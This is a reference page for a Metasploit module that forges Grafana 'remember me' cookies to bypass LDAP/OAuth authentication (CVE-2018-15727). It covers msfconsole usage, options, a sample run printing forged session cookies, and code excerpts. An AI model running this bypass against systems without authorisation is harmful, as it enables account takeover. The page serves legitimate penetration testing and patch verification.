Grafana 2.0 through 5.2.2 authentication bypass for LDAP and OAuth - Metasploit
This page contains detailed information about how to use the auxiliary/admin/http/grafana_auth_bypass metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.
Module Overview
Name: Grafana 2.0 through 5.2.2 authentication bypass for LDAP and OAuth
Module: auxiliary/admin/http/grafana_auth_bypass
Source code: modules/auxiliary/admin/http/grafana_auth_bypass.py
Disclosure date: 2019-08-14
Last modification time: 2022-09-29 01:28:56 +0000
Supported architecture(s): -
Supported platform(s): -
Target service / protocol: -
Target network port(s): 3000
List of CVEs: CVE-2018-15727
This module generates a remember me cookie for a valid username. Through unpropper seeding while userdate are requested from LDAP or OAuth it's possible to craft a valid remember me cookie. This cookie can be used for bypass authentication for everyone knowing a valid username.
Module Ranking and Traits
Module Ranking:
- normal: The exploit is otherwise reliable, but depends on a specific version and can't (or doesn't) reliably autodetect. More information about ranking can be found here.
Basic Usage
This module is a scanner module, and is capable of testing against multiple hosts.
msf > use auxiliary/admin/http/grafana_auth_bypass
msf auxiliary(grafana_auth_bypass) > show options
... show and set options ...
msf auxiliary(grafana_auth_bypass) > set RHOSTS ip-range
msf auxiliary(grafana_auth_bypass) > exploit
Other examples of setting the RHOSTS option:
Example 1:
msf auxiliary(grafana_auth_bypass) > set RHOSTS 192.168.1.3-192.168.1.200
Example 2:
msf auxiliary(grafana_auth_bypass) > set RHOSTS 192.168.1.1/24
Example 3:
msf auxiliary(grafana_auth_bypass) > set RHOSTS file:/tmp/ip_list.txt
Knowledge Base
Vulnerable Application
The following list shows the vulnerable versions of Grafana when configured for LDAP or OAuth:
- 2.x
- 3.x
- 4.x befroe 4.6.4
- 5.x before 5.2.3
Verification Steps
- Start msfconsole
- Do:
use auxiliary/admin/http/grafana_auth_bypass
- Do:
set username <username>
orset cookie <cookie>
- Do:
set version
- Do:
set rhosts
- Do:
set rport
- Do:
run
Scenarios
Example run against Grafana 3.x with username admin:
msf5 > use auxiliary/admin/http/grafana_auth_bypass
msf5 auxiliary(admin/http/grafana_auth_bypass) > show options
Module options (auxiliary/admin/http/grafana_auth_bypass):
Name Current Setting Required Description
---- --------------- -------- -----------
COOKIE no Decrypt captured cookie
RHOSTS 127.0.0.1 yes Address of target
RPORT 3000 yes Port of target
SSL false yes set SSL/TLS based connection
TARGETURI / no Base URL of grafana instance
THREADS 1 yes The number of concurrent threads
USERNAME no Valid username
VERSION 5 yes Grafana version: "2-4" or "5" (Accepted: 2-4, 5)
msf5 auxiliary(admin/http/grafana_auth_bypass) > set RHOSTS 192.168.202.3
RHOSTS => 192.168.202.3
msf5 auxiliary(admin/http/grafana_auth_bypass) > set USERNAME Administrator
USERNAME => Administrator
msf5 auxiliary(admin/http/grafana_auth_bypass) > run
[*] Running for 192.168.202.3...
[+] Encrypted remember cookie: 1bedc565c40b58307afa4672efd72d3c37f02684c2deb0ce0b55594cbce337fc90625356dc232e998f
[+] Set following cookies to get access to the grafana instance.
[+] grafana_user=Administrator;
[+] grafana_remember=a232b98b9365d3d8f7ce253adfb9779f1114131a68cc8cbb4a53ee6f5cb71acfbe25773e95db051021;
[+] grafana_sess=4ecdc0c13ebca229;
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
Go back to menu.
Msfconsole Usage
Here is how the admin/http/grafana_auth_bypass auxiliary module looks in the msfconsole:
msf6 > use auxiliary/admin/http/grafana_auth_bypass
msf6 auxiliary(admin/http/grafana_auth_bypass) > show info
Name: Grafana 2.0 through 5.2.2 authentication bypass for LDAP and OAuth
Module: auxiliary/admin/http/grafana_auth_bypass
License: Metasploit Framework License (BSD)
Rank: Normal
Disclosed: 2019-08-14
Provided by:
Rene Riedling
Sebastian Solnica
Check supported:
No
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
COOKIE no Decrypt captured cookie
RHOSTS 127.0.0.1 yes Address of target
RPORT 3000 yes Port of target
SSL false yes set SSL/TLS based connection
TARGETURI / no Base URL of grafana instance
THREADS 1 yes The number of concurrent threads (max one per host)
USERNAME no Valid username
VERSION 5 yes Grafana version: "2-4" or "5" (Accepted: 2-4, 5)
Description:
This module generates a remember me cookie for a valid username.
Through unpropper seeding while userdate are requested from LDAP or
OAuth it's possible to craft a valid remember me cookie. This cookie
can be used for bypass authentication for everyone knowing a valid
username.
References:
https://nvd.nist.gov/vuln/detail/CVE-2018-15727
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-15727
https://grafana.com/blog/2018/08/29/grafana-5.2.3-and-4.6.4-released-with-important-security-fix/
Module Options
This is a complete list of options available in the admin/http/grafana_auth_bypass auxiliary module:
msf6 auxiliary(admin/http/grafana_auth_bypass) > show options
Module options (auxiliary/admin/http/grafana_auth_bypass):
Name Current Setting Required Description
---- --------------- -------- -----------
COOKIE no Decrypt captured cookie
RHOSTS 127.0.0.1 yes Address of target
RPORT 3000 yes Port of target
SSL false yes set SSL/TLS based connection
TARGETURI / no Base URL of grafana instance
THREADS 1 yes The number of concurrent threads (max one per host)
USERNAME no Valid username
VERSION 5 yes Grafana version: "2-4" or "5" (Accepted: 2-4, 5)
Advanced Options
Here is a complete list of advanced options supported by the admin/http/grafana_auth_bypass auxiliary module:
msf6 auxiliary(admin/http/grafana_auth_bypass) > show advanced
Module advanced options (auxiliary/admin/http/grafana_auth_bypass):
Name Current Setting Required Description
---- --------------- -------- -----------
ShowProgress true yes Display progress messages during a scan
ShowProgressPercent 10 yes The interval in percent that progress should be shown
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
Auxiliary Actions
This is a list of all auxiliary actions that the admin/http/grafana_auth_bypass module can do:
msf6 auxiliary(admin/http/grafana_auth_bypass) > show actions
Auxiliary actions:
Name Description
---- -----------
Evasion Options
Here is the full list of possible evasion options supported by the admin/http/grafana_auth_bypass auxiliary module in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):
msf6 auxiliary(admin/http/grafana_auth_bypass) > show evasion
Module evasion options:
Name Current Setting Required Description
---- --------------- -------- -----------
Go back to menu.
Error Messages
This module may fail with the following error messages:
Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.
Module dependency (requests) is missing, cannot continue
Here is a relevant code snippet related to the "Module dependency (requests) is missing, cannot continue" error message:
103: return username
104:
105:
106: def run(args):
107: if dependencies_requests_missing:
108: logging.error('Module dependency (requests) is missing, cannot continue')
109: return
110:
111: if dependencies_cryptography_missing:
112: logging.error('Module dependency (cryptography) is missing, cannot continue')
113: return
Module dependency (cryptography) is missing, cannot continue
Here is a relevant code snippet related to the "Module dependency (cryptography) is missing, cannot continue" error message:
107: if dependencies_requests_missing:
108: logging.error('Module dependency (requests) is missing, cannot continue')
109: return
110:
111: if dependencies_cryptography_missing:
112: logging.error('Module dependency (cryptography) is missing, cannot continue')
113: return
114:
115: if args['VERSION'] == "5":
116: try:
117: username = args['USERNAME']
Unable to set username
Here is a relevant code snippet related to the "Unable to set username" error message:
123: try:
124: username = decrypt_version5(args['COOKIE'])
125: module.log("Decrypted username: "+username, "good")
126: cookie = args['COOKIE']
127: except:
128: module.log("Unable to set username", "error")
129: return
130: elif args['VERSION'] == "2-4":
131: try:
132: username = args['USERNAME']
133: cookie = encrypt_version4(args['USERNAME'])
Unable to set username
Here is a relevant code snippet related to the "Unable to set username" error message:
138: try:
139: username = decrypt_version4(args['COOKIE'])
140: module.log("Decrypted username: "+username, "good")
141: cookie = args['COOKIE']
142: except:
143: module.log("Unable to set username", "error")
144: return
145: else:
146: module.log("Version not supported.", "error")
147:
148: try:
Version not supported.
Here is a relevant code snippet related to the "Version not supported." error message:
141: cookie = args['COOKIE']
142: except:
143: module.log("Unable to set username", "error")
144: return
145: else:
146: module.log("Version not supported.", "error")
147:
148: try:
149: cookies = {'grafana_remember': cookie, 'grafana_user': username}
150:
151: if args['SSL'] == "false":
Failed to sending request to host.
Here is a relevant code snippet related to the "Failed to sending request to host." error message:
164: args['RPORT'] + args['TARGETURI'] + "/login/"
165: module.log('Targeting URL: ' + url, 'debug')
166: r = requests.get(url=url, cookies=cookies, allow_redirects=False)
167:
168: except:
169: module.log("Failed to sending request to host.", "error")
170: return
171:
172: if r.status_code == 302:
173: try:
174: grafana_user = re.search(
Failed to generate cookies out of request.
Here is a relevant code snippet related to the "Failed to generate cookies out of request." error message:
182: "Set following cookies to get access to the grafana instance.", "good")
183: module.log(grafana_user, "good")
184: module.log(grafana_remember, "good")
185: module.log(grafana_sess, "good")
186: except:
187: module.log("Failed to generate cookies out of request.", "error")
188: return
189: else:
190: module.log("Target is not vulnerable.", "warning")
191: return
192:
Go back to menu.
Related Pull Requests
References
- CVE-2018-15727
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-15727
- https://grafana.com/blog/2018/08/29/grafana-5.2.3-and-4.6.4-released-with-important-security-fix/
See Also
Check also the following modules related to this module:
- auxiliary/scanner/http/grafana_plugin_traversal
- auxiliary/admin/http/allegro_rompager_auth_bypass
- auxiliary/admin/http/iis_auth_bypass
- auxiliary/admin/http/netgear_pnpx_getsharefolderlist_auth_bypass
- auxiliary/admin/ldap/vmware_vcenter_vmdir_auth_bypass
- auxiliary/admin/networking/cisco_dcnm_auth_bypass
- auxiliary/admin/networking/cisco_secure_acs_bypass
- auxiliary/admin/networking/cisco_vpn_3000_ftp_bypass
- auxiliary/admin/vnc/realvnc_41_bypass
- auxiliary/gather/samsung_browser_sop_bypass
- auxiliary/scanner/http/cisco_ios_auth_bypass
- auxiliary/scanner/http/dir_webdav_unicode_bypass
- auxiliary/scanner/http/intel_amt_digest_bypass
- auxiliary/scanner/http/ms09_020_webdav_unicode_bypass
- auxiliary/scanner/http/rewrite_proxy_bypass
- auxiliary/scanner/http/verb_auth_bypass
- auxiliary/scanner/misc/dahua_dvr_auth_bypass
- auxiliary/scanner/ssh/libssh_auth_bypass
- auxiliary/admin/http/dlink_dir_300_600_exec_noauth
- auxiliary/admin/http/hikvision_unauth_pwd_reset_cve_2017_7921
- auxiliary/admin/http/netgear_auth_download
- auxiliary/admin/sap/sap_configservlet_exec_noauth
- auxiliary/gather/http_pdf_authors
- auxiliary/gather/peplink_bauth_sqli
- auxiliary/pdf/foxit/authbypass
- auxiliary/scanner/db2/db2_auth
- auxiliary/scanner/http/tplink_traversal_noauth
- auxiliary/scanner/mysql/mysql_authbypass_hashdump
- auxiliary/scanner/vmware/vmauthd_login
- auxiliary/scanner/vmware/vmauthd_version
- auxiliary/scanner/vnc/vnc_none_auth
- auxiliary/scanner/winrm/winrm_auth_methods
- auxiliary/scanner/http/fortimail_login_bypass_detection
Authors
- Rene Riedling
- Sebastian Solnica
Version
This page has been produced using Metasploit Framework version 6.2.23-dev. For more modules, visit the Metasploit Module Library.
Go back to menu.